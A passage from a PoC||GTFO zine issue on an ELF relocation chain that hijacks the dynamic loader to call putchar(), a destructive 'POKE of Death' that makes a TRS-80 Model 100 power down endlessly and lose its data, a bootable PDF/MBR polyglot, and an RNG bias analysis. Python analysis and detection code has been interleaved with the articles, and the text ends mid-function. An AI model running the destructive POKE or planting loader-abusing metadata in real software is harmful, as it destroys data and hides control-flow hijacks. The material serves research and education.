putchar(c) writes the character c, cast to an unsigned char, to stdout. 


RETURN VALUE 
putchar() returns the character written as an unsigned char cast to 
an int or EOF on error. 


puts() and fputs() return a nonnegative number on success, or EOF on error. 


One may ask “why focus on putchar()?” The answer is simple. Because putchar() is required in order to implement a full, honest-to-manul brainfuck-to-ELF metadata compiler. You may have noticed that putchar() requires only a single (byte-long) argument and have thought to yourself “I only have control over one argument!? How will that help me take over the world?” Don't worry your pretty little


"How is a sermon like a binary file? Both have prescribed parts that follow each other in a conventional order, but may 
be skipped or used creatively by an extra neighborly preacher. Convention is there to help, but it's the result that matters. 
So just think of exordium as the ELF/ABI header or vice versa and bear with the Preacher as you bear with your binary 
toolchain! —PML 
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nose off. I will provide insight on how you can control not one, not two, but three (ish) arguments to а 
function call! 

Instead of asking how one can control the first argument to a function call, one should really be 
asking how can we be the last to set the RDI register (the first argument to a function as heralded by 
the System V amd64 ABI gospel 3:2:3, aka amd64 calling convention8) before our metadata-driven libc 
function is called. 

It turns out that the loader generally processes each relocation entry within a single function, although 
there are a few exceptions to this rule. This means that, generally speaking, the arguments that are 
in place during any metadata-driven function call are the arguments that were passed to the currently 
executing function processing the relocation entries. An exception to this "rule" occurs when relocation 
entries of type R_X86_64_COPY are processed. These types of relocation entries cause the loader to 
make a call to memcpy(), thus changing the values of RDI, RSI, RDX, which by convention hold the first 
three arguments to a function call, and in the case of a call to memcpy(void *dest, const void *src, 
size_t n) hold dest, src, and size, respectively. 

Now imagine that the dynamic loader has been processing our relocation entries and now the next 
dynamic symbol, pointed to by the next relocation entry r0 to be processed, looks like this: 

s0 = {..., st_value = &putchar, st_size = 0x0} 


(Note: We have already shown how to calculate the address of libc functions in past work and will 
not cover how to do that in this sermon. See our WOOT article and POC||GTFO 00:05 for a thorough 
explanation.) 

The following three relocation entries (represented here as C structs, but of course encoded in a .rel 
section) will make a call to putchar(), to print the character of our choice: 

r0 = {r_offset=<&r2->r_addend>, r_symbol=0, r_type=R_X86_64_64, 
      r_addend=0x0} 

r1 = {r_offset=<char to print>, r_symbol=0, r_type=R_X86_64_COPY, 
      r_addend=0x0} 

r2 = {r_offset=&r2, r_symbol=0, r_type=R_X86_64_IRELATIVE, 
      r_addend=<&putchar (filled in by r0)>} 


The purpose of r0 is to write the address of putchar() into r2's addend. The purpose of r1 is to 
set up RDI (the first argument) for r2's function call. When it is processed, memcpy() is called with the 
following arguments: memcpy(<char to print>, &putchar, 0). More generally, the call to memcpy() 
looks like: memcpy(r1->r_offset, s0->st_value, s0->st_size). 

After r1 is processed, 0 bytes are copied from &putchar to <char to print>9, and RDI=<char to 
print>, RSI=&putchar, and RDX=0. r2, of type R_X86_64_IRELATIVE, instructs the loader to treat its 
addend as a function pointer, making a call to it(!). How's that for a relocation-based weird assembly 
instruction? But, one problem: relocation entries of type IRELATIVE do not support functions that 
require arguments (meaning that there is no conventional way to pass them). Still, the actual function 
doesn't care and will happily reach for its arguments in RDI etc.—and, luckily, we were able to set up 
the arguments via our relocation-entry crafted call to memcpy() via r1! Hence r2 will cause the loader 
to call putchar(), which will consult RDI to determine what character to print to stdout. 

You may see the potential downfalls of manufacturing a call to memcpy() in order to put arguments 
in place for the following library call. For example, if the third argument is not zero, you need to 
start worrying about your first two arguments pointing to read/writable memory. However, it may be 
comforting to know that the value returned by the function call is written into a spot of your choosing 
(in r2->r_offset). 

If you would like to further your studies of metadata-driven library calls, please refer to the elf-bf- 
tools repository on github.10 May the Great Manul keep and protect you from the Weird Machine. And 
let us say, amen. 
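The three-entry chain above is also something a loader-side audit can recognise, because each of its moving parts is unusual for a linker-generated binary: a relocation whose target lies inside the .rela table itself, an R_X86_64_COPY against a zero-sized symbol, and an R_X86_64_IRELATIVE whose addend slot is written by another entry. The following scanner is an added example, not code from the article or from the elf-bf-tools repository. It decodes raw Elf64_Rela and Elf64_Sym records with the layout from <elf.h>, and the sample table is constructed to mirror r0/r1/r2 at the addresses the gdb session shows (0x601318 and 0x601330 are 24 bytes apart, so the table is assumed to start at 0x601300); the putchar address and the r1 offset 0x601241 are taken from that session, and s0 is placed at dynsym index 1 because index 0 is the reserved null symbol.

```python
import struct

# Wire formats of Elf64_Rela and Elf64_Sym (little-endian), as in <elf.h>.
RELA = struct.Struct("<QQq")      # r_offset, r_info, r_addend
SYM = struct.Struct("<IBBHQQ")    # st_name, st_info, st_other, st_shndx, st_value, st_size

R_X86_64_64 = 1
R_X86_64_COPY = 5
R_X86_64_GLOB_DAT = 6
R_X86_64_IRELATIVE = 37
R_ADDEND_OFFSET = 16              # offset of r_addend inside an Elf64_Rela


def rela_entries(blob):
    return [RELA.unpack_from(blob, off) for off in range(0, len(blob), RELA.size)]


def sym_entries(blob):
    return [SYM.unpack_from(blob, off) for off in range(0, len(blob), SYM.size)]


def scan_relocs(rela_blob, rela_vaddr, dynsym_blob):
    """Return [(index, r_type, [notes])] for entries that look like loader
    programming rather than ordinary link-time fix-ups."""
    relas = rela_entries(rela_blob)
    syms = sym_entries(dynsym_blob)
    rela_end = rela_vaddr + len(rela_blob)
    findings = []
    for i, (r_offset, r_info, _r_addend) in enumerate(relas):
        r_type = r_info & 0xFFFFFFFF
        r_sym = r_info >> 32
        notes = []
        # Target inside the relocation table itself: the loader is made to
        # rewrite its own "instruction stream" (r0 writing r2->r_addend).
        if rela_vaddr <= r_offset < rela_end:
            notes.append("writes into .rela")
        # COPY of a zero-sized symbol moves no bytes; its only effect is the
        # memcpy() call that loads RDI/RSI/RDX (r1 in the article).
        if r_type == R_X86_64_COPY and r_sym < len(syms) and syms[r_sym][5] == 0:
            notes.append("zero-length COPY")
        # IRELATIVE calls its addend as a resolver.  If another entry's
        # r_offset is this entry's r_addend slot, the callee is chosen at
        # load time by the metadata, not fixed at link time (r2).
        if r_type == R_X86_64_IRELATIVE:
            addend_addr = rela_vaddr + i * RELA.size + R_ADDEND_OFFSET
            if any(o == addend_addr for j, (o, _, _) in enumerate(relas) if j != i):
                notes.append("IRELATIVE addend patched by another relocation")
        if notes:
            findings.append((i, r_type, notes))
    return findings


# Constructed sample: the article's r0/r1/r2 chain at the assumed addresses.
RELA_VADDR = 0x601300
PUTCHAR = 0x7FFFF7CE1184          # value of putchar in the gdb session


def r_info(sym_index, r_type):
    return (sym_index << 32) | r_type


SAMPLE_RELA = b"".join([
    # r0: write s0->st_value + 0 (= &putchar) into r2's addend
    RELA.pack(RELA_VADDR + 2 * RELA.size + R_ADDEND_OFFSET, r_info(1, R_X86_64_64), 0),
    # r1: memcpy(<char to print>, &putchar, 0): sets RDI, copies nothing
    RELA.pack(0x601241, r_info(1, R_X86_64_COPY), 0),
    # r2: call *r_addend; the return value lands at r_offset (= &r2)
    RELA.pack(RELA_VADDR + 2 * RELA.size, r_info(0, R_X86_64_IRELATIVE), 0),
])
# dynsym: index 0 is the mandatory null symbol; index 1 plays s0 (STT_FUNC, size 0).
SAMPLE_DYNSYM = SYM.pack(0, 0, 0, 0, 0, 0) + SYM.pack(0, 0x12, 0, 0, PUTCHAR, 0)

if __name__ == "__main__":
    for idx, typ, notes in scan_relocs(SAMPLE_RELA, RELA_VADDR, SAMPLE_DYNSYM):
        print(f"r{idx} (type {typ}): {'; '.join(notes)}")
```

The three checks are heuristics, not proofs: a genuine ifunc resolver has a fixed IRELATIVE addend, a genuine COPY relocation copies a variable of nonzero size, and nothing a linker emits aims a relocation back at the relocation table. Any one hit deserves a look; all three in sequence is the signature of the chain described above.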


8http://www.x86-64.org/documentation/abi.pdf, pages 17-21, Fig. 3.4—and don't ask us in what world RDI, RSI, RDX 
might stand for A, B, C or suchlike. This program may be brought to you by the register RDI anyhow, but let's just say if 
the Manul meets the amd64 Big Bird there might be feathers flying. 

9Note, memcpy would treat it as a destination pointer, but luckily nothing gets copied here, and memcpy implementation 
isn't paranoid about checking its arguments, since a bad pointer would trap anyway. 

10See syscall/putchar in https://github.com/bx/elf-bf-tools . 





429       case R_X86_64_COPY:
430         if (sym == NULL)
431           /* This can happen in trace mode if an object could not be
432              found.  */
433           break;
434         memcpy (reloc_addr_arg, (void *) value,
435                 MIN (sym->st_size, refsym->st_size));
436         if (__builtin_expect (sym->st_size > refsym->st_size, 0)
437             || (__builtin_expect (sym->st_size < refsym->st_size, 0)
438                 && GLRO(dl_verbose)))
439           {
440             fmt = "\
441 %s: Symbol `%s' has different size in shared object, consider re-linking\n";
442             goto print_err;
443           }
444         break;
445 # endif
446       case R_X86_64_IRELATIVE:
447         value = map->l_addr + reloc->r_addend;
448         value = ((Elf64_Addr (*) (void)) value) ();
449         *reloc_addr = value;
450         break;

Breakpoint 6, elf_machine_rela (sym=0x601030, reloc_addr_arg=0x601241, version=<optimized out>,
    reloc=0x601318, map=0x555555773228) at ../sysdeps/x86_64/dl-machine.h:434
434         memcpy (reloc_addr_arg, (void *) value,
(gdb) print/x *reloc
$6 = {r_offset = 0x601241, r_info = 0x5, r_addend = 0x0}
(gdb) print refsym->st_size
$7 = 0
(gdb) print sym->st_size
$8 = 0
(gdb) print/x reloc_addr_arg
$9 = 0x601241
(gdb) x/gx reloc_addr_arg
0x601241:       0x0000000060103800
(gdb) x/gx value
0x7ffff7ce1184: 0x011d8b48f8894153
(gdb) print/x $rsi
$5 = 0x7ffff7ce1184
(gdb) print $rdx
$10 = 

(after memcpy)

(gdb) x/gx 0x601241
0x601241:       0x0000000060103800
(gdb) print/x $rdi
$14 = 0x601241
(gdb) c
Continuing.

Breakpoint 5, elf_machine_rela (sym=0x601030, reloc_addr_arg=0x6012e8, version=<optimized out>,
    reloc=0x601330, map=0x555555773228) at ../sysdeps/x86_64/dl-machine.h:448
448         value = ((Elf64_Addr (*) (void)) value) ();
(gdb) print/x $rdi
$15 = 0x601241
(gdb) print/x value
$16 = 0x7ffff7ce1184
(gdb) x/10i value
   0x7ffff7ce1184:      push   %rbx
   0x7ffff7ce1185:      mov    %edi,%r8d
   0x7ffff7ce1188:      mov    0x313c01(%rip),%rbx        # 0x7ffff7ff4d90
   0x7ffff7ce118f:      mov    (%rbx),%eax
   0x7ffff7ce1191:      test   $0x80,%ah
   0x7ffff7ce1194:      jne    0x7ffff7ce11ea
   0x7ffff7ce1196:      mov    %fs:0x10,%r9
   0x7ffff7ce119f:      mov    0x88(%rbx),%rax
   0x7ffff7ce11a6:      cmp    0x8(%rdx),%r9
   0x7ffff7ce11aa:      je     0x7ffff7ce11df
(gdb) print/x $rsi
$4 = 0x7ffff7ce1184







Just as Jonah was told to preach in Nineveh, 
Pastor Laphroaig was once called to preach to the harlots and tax collectors at RSA. 
Asked about the experience, he said that, like Jonah, 
he'd rather be thrown overboard than go back. 
7 POKE of Death for the TRS-80 Model 100 


by Dave Weinstein 


In his Epistle on the Divinity of Languages, PoC||GTFO 01:07, Pastor Manul Laphroaig wrote of the 
merits of PEEK and POKE in teaching the youth of a previous generation how to fiddle with hardware 
in ways the hardware did not want to be fiddled. 

And so I offer to you a short example of the wonders of POKE as applied to interrupt handlers. 

In 1983, Radio Shack introduced the Model 100, a copy of the Kyocera Kyotronic 85. With its 40 
character wide 8-line screen, built-in 300 baud modem, and up to 32k of RAM, it was a state of the art 
laptop, capable of generating endless questions from passengers and crew on any flight. 

In high memory, there is a vector at 0xF5FF, which allows a program to hook the keyboard/clock 
interrupt. Every 4 ms or so, the timer interrupt fires, and the keyboard is polled. By default, the vector 
is a simple RET NOP NOP. 

As it happens, the very next vector in high memory is a JMP to handle the low-power situation and 
shut the computer down. 


0xf5ff  0xc9  (RET) 
0xf600  0x00  (NOP) 
0xf601  0x00  (NOP) 
0xf602  0xc3  (JMP 0x1431) 
0xf603  0x31 
0xf604  0x14 

The function at 0x1431 will turn the computer off, as the code flows to the actual shutdown sequence 
at 0x1451: 

0x1451  di 
0x1452  in 0xba 
0x1454  ori 0x10 
0x1456  out 0xba 
0x1458  hlt 


Should we replace the RET at 0xF5FF (62975) with a NOP, the Model 100 will power down every time 
the timer interrupt fires. The only way to restore functionality is to do a cold restart of the machine, 
which, if I recall correctly, in this case requires removing the batteries, unplugging the machine, and 
disabling the internal NiCad battery. All of the contents would be lost. For those who do not know what 
has been done, the computer shows every sign of having simply died. 

POKE 62975, 0 

The only way to prevent it is to prevent access to the BASIC interpreter. Which is possible, but is a 
discussion for another time. 
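The whole trick is a one-byte change to control flow: with the RET gone, the interrupt hook runs off the end of its own three-byte slot into the neighbouring power-down vector. The following is an added example, not code from the article: a Python model of the two vectors with a minimal 8085 control-flow tracer, so the before/after paths can be compared without a Model 100. The bytes at 0xF5FF and the JMP target are those listed above; the opcode bytes for DI, IN, ORI, OUT and HLT (F3, DB, F6, D3, 76) are from the 8080/8085 instruction set and are not printed in the article; the ROM between 0x1431 and 0x1451 is not shown either, so a constructed JMP 0x1451 stands in for it.

```python
# 8085 opcodes needed for the two vectors (8080/8085 instruction set).
OPS = {0x00: ("NOP", 1), 0xC9: ("RET", 1), 0xC3: ("JMP", 3), 0xF3: ("DI", 1),
       0xDB: ("IN", 2), 0xF6: ("ORI", 2), 0xD3: ("OUT", 2), 0x76: ("HLT", 1)}

HOOK_VECTOR = 0xF5FF          # keyboard/clock interrupt hook: RET NOP NOP
POWER_DOWN_VECTOR = 0xF602    # JMP 0x1431 -> low-power shutdown
SHUTDOWN = 0x1451


def model100_memory():
    """Constructed 64K image holding only the bytes the article lists."""
    mem = bytearray(0x10000)
    mem[HOOK_VECTOR:HOOK_VECTOR + 6] = bytes([0xC9, 0x00, 0x00, 0xC3, 0x31, 0x14])
    # Stand-in for the unlisted ROM at 0x1431 that "flows to" the shutdown code.
    mem[0x1431:0x1434] = bytes([0xC3, 0x51, 0x14])
    # di / in 0xba / ori 0x10 / out 0xba / hlt
    mem[SHUTDOWN:SHUTDOWN + 8] = bytes([0xF3, 0xDB, 0xBA, 0xF6, 0x10, 0xD3, 0xBA, 0x76])
    return mem


def poke(mem, addr, value):
    """BASIC's POKE: store one byte at a decimal address."""
    mem[addr] = value & 0xFF


def trace(mem, pc, limit=32):
    """Follow control flow from pc; return the mnemonics executed until a
    RET (back to the interrupt handler) or a HLT (the machine is off)."""
    out = []
    for _ in range(limit):
        op = mem[pc]
        if op not in OPS:
            out.append(f"DB {op:02X}")      # unknown byte: stop decoding
            break
        name, size = OPS[op]
        if size == 3:
            target = mem[pc + 1] | (mem[pc + 2] << 8)
            out.append(f"{name} {target:04X}")
            pc = target
            continue
        out.append(name if size == 1 else f"{name} {mem[pc + 1]:02X}")
        if name in ("RET", "HLT"):
            break
        pc += size
    return out


def hook_vector_state(mem):
    """What a diagnostic would report about the first byte of the hook."""
    op = mem[HOOK_VECTOR]
    if op == 0xC9:
        return "unhooked (RET)"
    if op == 0xC3:
        return "hooked (JMP %04X)" % (mem[HOOK_VECTOR + 1] | mem[HOOK_VECTOR + 2] << 8)
    return "falls through into the power-down vector"


if __name__ == "__main__":
    mem = model100_memory()
    print("before:", hook_vector_state(mem), trace(mem, HOOK_VECTOR))
    poke(mem, 62975, 0)               # the POKE of Death
    print("after: ", hook_vector_state(mem), trace(mem, HOOK_VECTOR))
```

The tracer deliberately stops at HLT: on the real machine the OUT to port 0xBA has already cut the power by then, and the next timer tick never arrives.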





Figure 3: POKE 62975, 0 
Pastor Laphroaig tells us that the news is stranger than fiction, 
because unlike the news, fiction requires an element of truth. 
8 This OS is also a PDF 


by Ange Albertini 


A careful reader may have noticed that a bootable OS image was hidden in the last issue of PoC||GTFO, 
as one of the files in its dual PDF/ZIP structure (if you haven't, download and extract it now!). This 
time, though, let's hide it in plain sight. You will find by running 'qemu-system-i386 -fda pocorgtfo02.pdf' 
that the PDF file you are reading is also a bootable disk image. 


8.1 Requirements 


To combine two file types, we first need to list the requirements of each format and then produce a single 
file that meets both sets of requirements with no conflicts. 

What makes a bootable disk image? An x86 machine begins booting by copying the first 512 byte 
sector, the Master Boot Record, into RAM and executing it. The requirements for a functional MBR 
are simple: 

• 16 bit x86 code starts at offset 00. 

• It will be executing at the 0000:7c00 address in RAM. 

• It must be 512 bytes long, ending with the signature 55, AA. 

• Labels and primary partition tables are optional, but can go within this sector. 

• It must contain code that finds and loads into RAM the code for the next boot stage (such as an 
OS loader). 


PDF files are a mixture of text and binary fragments, which are parsed from the start of the file and 
delimited by words and newlines. The requirements for a valid PDF are also simple and surprisingly 
flexible: 

• It is initially parsed as text. 

• The signature "%PDF-" must be present within the first 1024 bytes. It can be present there twice 
or more. 

• Comment lines begin with '%', which is 25 in hex. 

• Binary characters other than CRLF are acceptable in a comment. 

• "Multi-line" binary objects or simply larger objects can also be stored in object streams, which are 
declared like this: 

<obj number> <revision> obj 
<<>> 
stream 
<stream content> 
endstream 
endobj 


8.2 Strategy 


In most cases, we can freely prepend anything at the start of the file as long as the above requirements 
are fulfilled. Luckily, the % comment character is 0x25, which encodes nicely as an x86 and instruction. 
Thus, the head of the file can be 25FFFF: and ax, 0xffff, which also starts a PDF comment. We can 
then add a jump into the next part of the code, which will be stored in a dummy object stream below, 
and then finish our first line. Adding a PDF signature will prevent any potential problem in case the 
stream object is too long: it can then contain anything, of any length, as long as it doesn't contain the 
'endstream' keyword. 
; this will encode as '%\xff\xff\xeb\x21', a comment line 
and ax, -1 
jmp start 

%PDF-1.5 

999 0 obj 
<<>> 
stream 

code: 

; put the 55AA signature at the end of the 512 block 
times 200h - 2 - ($ - $$) db 0cch 
db 55h, 0aah 

endstream 
endobj 
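The same layout can be produced and checked mechanically, which is handy both for building such a file and for recognising one. The script below is an added example, not the article's own tooling: it lays out one 512-byte sector exactly as the listing above does (and ax,0xffff; jmp short into a dummy stream object; 0xcc padding; 55 AA), computing the short-jump displacement from the header length rather than hard-coding 0x21, and then checks an arbitrary blob against both sets of requirements. The object number, the use of jmp short instead of the near jmp seen in the hexdump, and the hlt payload used in the test are constructed choices.

```python
SECTOR = 512
# Rest of the first line plus the dummy object that holds the real code,
# following the listing in the article.
PDF_HEAD = b"\n%PDF-1.5\n999 0 obj\n<<>>\nstream\n"


def build_polyglot_sector(payload):
    """One 512-byte boot sector whose first bytes also open a PDF comment."""
    if b"endstream" in payload:
        raise ValueError("payload must not contain the endstream keyword")
    # 25 FF FF: and ax,0xffff; 0x25 is '%', so the line is a PDF comment.
    # EB <disp>: jmp short, relative to offset 5, so it lands on the payload
    # right after "stream\n".
    head = b"%\xff\xff" + bytes([0xEB, len(PDF_HEAD)])
    body = head + PDF_HEAD + payload
    if len(body) > SECTOR - 2:
        raise ValueError("payload does not fit in one sector")
    padding = b"\xcc" * (SECTOR - 2 - len(body))    # int3 filler, as in the listing
    return body + padding + b"\x55\xaa"


def polyglot_file(payload):
    """Sector followed by the keywords that close the PDF stream object."""
    return build_polyglot_sector(payload) + b"\nendstream\nendobj\n"


def analyze(data):
    """Check an arbitrary blob against the MBR and PDF requirements."""
    mbr_signature = len(data) >= SECTOR and data[SECTOR - 2:SECTOR] == b"\x55\xaa"
    pdf_sig = data.find(b"%PDF-", 0, 1024)          # -1 if absent from the first 1 KiB
    entry = None
    if len(data) >= 5 and data[0] == 0x25 and data[3] == 0xEB:
        disp = data[4] - 256 if data[4] >= 128 else data[4]
        entry = 5 + disp                            # where the and/jmp head lands
    stream = data.find(b"stream\n")
    stream_body = stream + len(b"stream\n") if stream >= 0 else None
    return {
        "mbr_signature": mbr_signature,
        "pdf_signature_offset": pdf_sig,
        "first_line_is_comment": data[:1] == b"%",
        "code_entry": entry,
        "entry_inside_stream": entry is not None and stream_body is not None
        and entry >= stream_body,
    }


if __name__ == "__main__":
    image = polyglot_file(b"\xf4")                  # constructed payload: hlt
    print(analyze(image))
```

A file that satisfies mbr_signature and pdf_signature_offset together, with a code_entry that points into the stream body, is precisely the shape described above; a plain PDF fails the first check and a plain boot sector fails the second, which is what makes the pair a useful triage test.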


8.3 An Unexpected Challenge 


This was almost too easy, but there is a caveat to keep in mind. I'll mention it here to save you the 
headache when reproducing these results. 

This new challenge emerged as I was testing the bootable PDF files with different PDF readers. 
Since we pre-pend our MBR without altering the contents of the original document, the original's cross- 
reference table XREF is no longer in sync with the actual file offsets. Technically, this makes the XREF 
tables corrupted. 

Corrupted XREFs are so common that they are usually transparently recovered by all PDF readers, 
even picky ones such as PDF.JS. However, your pdflatex may generate a document based on the opti- 
mized PDF 1.5 specification, where the XREF is stored not in cleartext as in PDF 1.4, but rather as a 
separate, compressed object. This configuration choice is made for the user by the TeX distribution, so 
even a freshly updated pdflatex install may generate PDF 1.4 documents. 

Even when compressed, corrupted XREFs are recovered by some readers, such as GS and Sumatra. 
Unfortunately, Foxit, Adobe, Firefox, Chrome, and Poppler-based readers—such as Evince and Okular— 
would reject such a document. Although rejecting corrupted documents out of hand is the best strategy, 
even Pastor Laphroaig would be pretty pissed if folks couldn't read his epistles because of this. 

A simple and elegant workaround that achieves 100% reader compatibility with our MBR PDF is to 
make sure that, even if your pdflatex distribution generates a 1.5 format document, it doesn't compress 
the XREF. This is easily done by adding the following command to your LaTeX source.














\pdfobjcompresslevel=0 


This command will cause pdflatex to store non-objects uncompressed while still taking advantage of 
other 1.5 features such as reducing document bloat. I should add that, although the fix looks trivial, 
finding the real cause and the most elegant solution was a challenge. 





Enjoy booting this PDF, and be sure to share copies—both electronic and paper—so that your 
neighbors can enjoy it as well! 
00000000  25 ff ff e9 fc 00 0a 25 50 44 46 2d 31 2e 35 0a  |%......%PDF-1.5.|
00000010  39 39 39 39 20 30 20 6f 62 6a 0a 3c 3c 3e 3e 0a  |9999 0 obj.<<>>.|
00000020  73 74 72 65 61 6d 0a 0a 50 6f 43 20 6f 72 20 47  |stream..PoC or G|
00000030  54 46 4f 20 49 73 73 75 65 20 30 78 30 32 0a 0d  |TFO Issue 0x02..|
00000040  62 79 20 52 74 2e 20 52 76 64 2e 20 50 61 73 74  |by Rt. Rvd. Past|
00000050  6f 72 20 4d 61 6e 75 6c 20 4c 61 70 68 72 6f 61  |or Manul Laphroa|
00000060  69 67 20 61 6e 64 20 46 72 69 65 6e 64 73 0a 0a  |ig and Friends..|
00000070  0d 00 59 6f 75 20 68 61 76 65 20 62 65 65 6e 20  |..You have been |
00000080  65 61 74 65 6e 20 62 79 20 61 20 67 72 75 65 2e  |eaten by a grue.|
00000090  20 20 53 6f 72 72 79 2e 0a 0d 54 72 79 20 74 68  |  Sorry...Try th|
000000a0  69 73 3a 20 71 65 6d 75 2d 73 79 73 74 65 6d 2d  |is: qemu-system-|
000000b0  69 33 38 36 20 2d 66 64 61 20 70 6f 63 6f 72 67  |i386 -fda pocorg|
000000c0  74 66 6f 30 32 2e 70 64 66 0a 0d 00 31 29 20 52  |tfo02.pdf...1) R|
000000d0  65 61 64 69 6e 67 20 6b 65 72 6e 65 6c 20 66 72  |eading kernel fr|
000000e0  6f 6d 20 64 69 73 6b 2e 0a 0d 00 32 29 20 45 78  |om disk....2) Ex|
000000f0  65 63 75 74 69 6e 67 20 6b 65 72 6e 65 6c 2e 0a  |ecuting kernel..|
00000100  [rows 0x100-0x1f0: the 16-bit boot code, 0xcc padding and the closing 55 aa signature; not legible in this scan]

Hey kids! Can you color the bytes of this MBR to indicate what's going on? 
9 A Vulnerability in Reduced Dakarand from PoC||GTFO 01:02 

by joernchen of Phenoelit 

I'm not a math guy, so this is a poor man's RNG analysis. Try it yourself at home! 


9.1 Introduction 


In PoC||GTFO 01:02, Dan Kaminsky proposed the following code for use as a Random Number Gen- 
erator, arguing that the phase difference between a fast clock and a slow clock is sufficient to produce 
random bits in a high level language. This is a reduced version of his Dakarand program, with the intent 
of the reduction being that if there is any vulnerability within the code, that vuln ought to be exploitable. 


// These functions form an RNG.
function millis() {return Date.now();}
function flip_coin()
  {n=0; then=millis()+1; while(millis()<=then) {n=!n;} return n;}
function get_fair_bit()
  {while(1) {a=flip_coin(); if(a!=flip_coin()) {return(a);}}}
function get_random_byte()
  {n=0; bits=8; while(bits--){n<<=1; n|=get_fair_bit();} return n;}

// Use it like this.
report_console = function() {while(1){console.log(get_random_byte());}}
report_console();


Actually the above code boils down to the function flip_coin, which takes a boolean value n=0 and 
continuously flips it until the next millisecond. The outcome of this repeated flipping shall be a random 
bit. We neglect the get_fair_bit function mostly in this analysis, as it just slows down the process and 
adds almost no additional entropy. For gathering random bits we are just left with the clock ticking for 
us. 


9.2 А Naive Analysis 


In order to analyze the output of the RNG we need some of its output, so I simply put up a small HTML 
piece which would pull out 100,000 random bytes out of the above RNG and log it to the HTML document. 
Then a severe 90-minute DoS on my Firefox 24 happened, after which I managed to copy and paste one 
hundred thousand uint8_t results into a text file. 

After messing with several tools like ministat, sort and uniq I could show with the following ruby 
script that this RNG (on my machine) has a strong bias towards bytes with low hamming weights: 


#!/usr/bin/env ruby
# Count how often each value occurs in the captured output (one number per line).
f = File.open(ARGV[0])
h = Hash.new
f.each_line do |m|
  n = m.to_i
  if h[n].nil?
    h[n] = 1
  else
    h[n] = h[n] + 1
  end
end

# Sort by count and print value, count, and Hamming weight (number of 1 bits).
t = h.sort_by do |k, v| v end
t.each do |a|
  puts "Num:\t#{a[0]}\t" +
       "\tCount:\t#{a[1]}\t" +
       "\tWeight:\t#{a[0].to_s(2).split("").reject { |i| i == "0" }.count}"
end


The shortened output of this script on the 100K 8-bit numbers is as follows. Note that the heavy 
hamming weights, like 11111111, are least common and the light hamming weights, like 00000000, are 
most common. 

Value   Count   Weight
255     22      8
254     27      7
251     29      7
253     28      7
127     29      7
239     32      7
191     34      7
223     34      7
247     36      7
...
0       3918    0

The table lists the Number which is the output of the RNG along with this number's hamming weight 
as well as the count of this number in total within the 100,000 random bytes. For a random distribution 
of all possible bytes we could expect roughly a count of 390 for each byte. But as we see, the number 0 
with the hamming weight 0 peaks out with a count of 3918, whereas 255 with the hamming weight of 8 
is generated 22 times by the RNG. That's not fair! 


9.3 My fair bit is not fair! 

Real statistical analysis of an RNG is hard, and I will not attempt it here. Still, looking at a few 
simple distributions might give us a hint (alas, only a hint) of what might be behind the unfairness. 

First, a short recap on how this RNG works: We've got a 1 millisecond timeslot from t0 to t1, where 
at t1 the flip_coin method will stop. The first call to get_random_byte can happen anywhere between 
t0 and t1: 

Let's say it is here: 

Now the algorithm happily flips the bit until t1 and hands over the result of this flipping as a random 
bit (note that we're omitting get_fair_bit here). 

Somewhere here the JS engine jumps in 

Although we cannot predict the output of a single run of flip_coin, things get a bit more predictable 
when we make a lot of consecutive calls to flip_coin. Let's say we need the time d to process and store 
the result of flip_coin. So the next time we flip_coin we are at t1 + d1: 

Now the RNG flips the coin until t2 in order to give us a random bit. As we are calling the RNG 
more than twice in a row, the next flip_coin is at t2+d2, and so on. 

The randomness and fairness of the RNG's random bit depends on how fairly and randomly we get 
odd and even values of d, since the same amount of flips yields the same bit as we have a static start 
value of 0/false.11 So it makes sense to look at the distribution of d. To visualize this and to compare 
it with another browser I came up with this slight modification of the RNG that counts the flips and 
records them right inside the HTML page: 

// millis() as in the original listing above.
function millis() {return Date.now();}

// Same loop as before, but also returns the number of flips made.
function flip_coin()
  {i=0;n=0; then=millis()+1; while(millis()<=then) {n=!n;i++} return [n,i];}

function get_fair_bit()
  {while(1) {a=flip_coin(); if(a[0]!=flip_coin()[0]) {return(a);}}}

// Append 10000 "bit,flips" pairs to the element with id "target".
function doit(){
  var i = 10000;
  while(i--){
    var d = document.getElementById("target");
    var content = document.createTextNode( get_fair_bit().toString() + "\n");
    d.appendChild( content );
  }
}




















Loading the page in Chromium and Firefox and throwing them into gnuplot, we get: 

[Figure: distribution of flip counts per millisecond, x axis "Cycle Count"; Firefox (left) and Chromium (right)] 


We can see that the graph for Chromium has a lot more variance in the number of coin flips within 
a millisecond than that for Firefox. Although, strictly speaking, it might still be possible to get good 
randomness with poor variance if the few frequent values were to alternate just so due to some underlying 
scheduling magic, it seems reasonable to expect that the same magic would also increase the variance in 
the flip numbers. 

We can also see, with the help of simple UNIX tools, that Chromium counts do not peak out to a 
certain value, unlike those of Firefox: 

11The second coin flip in get_fair_bit complicates it a bit, but it cannot substantially improve the RNG's entropy if it 
lacks in the first place. 
$ sort iter_Firefox|uniq -c|sort -n       $ sort iter_Chromium|uniq -c|sort -n
    176 64683                                 15 45147
    181 64671                                 15 45282
    195 64673                                 16 44947
    195 64684                                 16 45004
    207 64717                                 16 45010
    217 64672                                 16 45076
    286 64718                                 16 45086
    318 64721                                 17 45059
    393 64719                                 17 45107
    405 64720                                 19 45092
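The argument of the last two subsections, that the bit is the parity of the flip count and the flip count is fixed by how far past the millisecond boundary each call starts, can be checked in a model rather than a browser. The following is an added example, not code from the article: it reimplements the Hamming-weight statistic of the ruby script above and simulates flip_coin/get_random_byte with get_fair_bit left out, exactly as the analysis does. The two overhead models are constructed stand-ins for scheduler behaviour (a constant delay for the Firefox-like tight peak, a seeded PRNG for the Chromium-like spread), and the flip-per-millisecond figures are chosen to resemble the sort|uniq output, not measured.

```python
import random


def hamming_weight(b):
    """Number of 1 bits in a byte (the Weight column of the ruby script)."""
    return bin(b & 0xFF).count("1")


def weight_histogram(byte_values):
    """Counts of Hamming weights 0..8 over a sequence of bytes."""
    hist = [0] * 9
    for b in byte_values:
        hist[hamming_weight(b)] += 1
    return hist


def simulate(byte_count, flips_per_ms, overhead):
    """Model of flip_coin/get_random_byte with get_fair_bit omitted.
    Time is counted in flips: flips_per_ms flips fit in one millisecond slot.
    A call that starts t flips into a slot performs flips_per_ms - t flips
    before the slot ends, and the bit it returns is the parity of that count
    (n starts at false).  The next call starts d flips after the boundary,
    d being the per-call overhead drawn from overhead().
    Returns (bytes, flip counts)."""
    out_bytes, flip_counts = [], []
    t = 0
    for _ in range(byte_count):
        value = 0
        for _ in range(8):
            n = flips_per_ms - t
            flip_counts.append(n)
            value = (value << 1) | (n & 1)
            t = overhead() % flips_per_ms
        out_bytes.append(value)
    return out_bytes, flip_counts


def constant_overhead(d):
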